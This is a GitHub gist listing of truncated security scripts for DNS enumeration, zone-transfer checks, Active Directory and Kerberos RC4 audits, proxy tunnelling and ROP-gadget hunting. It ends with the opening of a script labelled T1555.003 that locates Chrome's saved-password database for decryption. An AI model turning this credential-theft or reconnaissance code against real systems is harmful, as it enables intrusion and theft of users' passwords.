Skip to content

Instantly share code, notes, and snippets.

View joshfinley's full-sized avatar
💭
yeet

Josh Finley joshfinley

💭
yeet
28 followers · 16 following
  • United States
View GitHub Profile
@joshfinley
joshfinley / hunt-cfgless-rops.py
Created August 9, 2024 16:24
🥱
# 🥱 https://www.elastic.co/security-labs/get-injectedthreadex-detection-thread-creation-trampolines
import os
import pefile
import re
# Define the flag for CFG in DLL characteristics
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000
# Define the flag for executable sections
IMAGE_SCN_MEM_EXECUTE = 0x20000000
@joshfinley
joshfinley / Sysvol-GPOCheck
Created May 30, 2024 14:07
# Import the Group Policy module
Import-Module GroupPolicy
# Get all the Group Policy Objects (GPOs)
$GPOs = Get-GPO -All
# Initialize an array to store GPOs with File System security settings
$GPOsWithSysvolPermissions = @()
# Loop through each GPO and check for File System security settings affecting SYSVOL
@joshfinley
joshfinley / recursive-dns-enum.py
Created February 22, 2024 20:59
Take a list of domain names and try dnsenum against them all
import subprocess
import sys
def run_dnsenum(wordlist, dns_server, domain_file):
with open(domain_file, 'r') as file:
domains = file.readlines()
for domain in domains:
domain = domain.strip()
command = [
@joshfinley
joshfinley / recursive-zone-transfer.py
Last active February 22, 2024 20:24
Check for zone transfers in a domain and all its subdomains
import dns.query
import dns.zone
import sys
def axfr_query(domain, nameserver):
try:
zone = dns.zone.from_xfr(dns.query.xfr(nameserver, domain))
return zone
except Exception:
return None
@joshfinley
joshfinley / Get-AdGroupMembersBatch.ps1
Created February 14, 2024 20:46
param(
[string]$filePath
)
Import-Module ActiveDirectory
Get-Content $filePath | ForEach-Object {
$groupName = $_
Write-Host "`nGroup-Name $groupName"
Write-Host "----------------"
@joshfinley
joshfinley / Get-ADGroupPerms.ps1
Created January 25, 2024 18:16
# Import the Active Directory module
Import-Module ActiveDirectory
# Group name to search for
$groupName = "YourGroupName"
# Get the group
$group = Get-ADGroup -Filter { Name -eq $groupName }
if ($group -ne $null) {
@joshfinley
joshfinley / ssh_tunnel_http_connect.py
Created November 15, 2023 17:28
import paramiko
import socket
import select
def http_connect_tunnel(proxy_host, proxy_port, target_host, target_port):
"""
Establish an HTTP CONNECT tunnel through a proxy.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((proxy_host, proxy_port))
@joshfinley
joshfinley / Get-SpnsRc4Enabled.ps1
Created November 13, 2023 17:32
# Import the Active Directory module
Import-Module ActiveDirectory
# Search for all AD objects with SPNs
$objectsWithSPN = Get-ADObject -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes
# Iterate through each object and check for RC4 encryption
foreach ($obj in $objectsWithSPN) {
$name = $obj.Name
$spns = $obj.ServicePrincipalName
@joshfinley
joshfinley / Check-RC4SPNs.ps1
Created November 13, 2023 17:25
# Import the Active Directory module
Import-Module ActiveDirectory
# Enumerate all user accounts with SPNs
$usersWithSPN = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes
# Iterate through each user and check for RC4 encryption
foreach ($user in $usersWithSPN) {
$userName = $user.SamAccountName
$spns = $user.ServicePrincipalName
@joshfinley
joshfinley / T1555.003-Chrome.py
Last active November 6, 2023 15:51
import sqlite3
import shutil
import os
import win32crypt
from importlib import import_module
def get_chrome_db_path():
"""Determine the path of the Chrome history database based on the operating system."""
if os.name == "nt": # Windows
return f"C:\\Users\\{os.getlogin()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data".format(os.getlogin())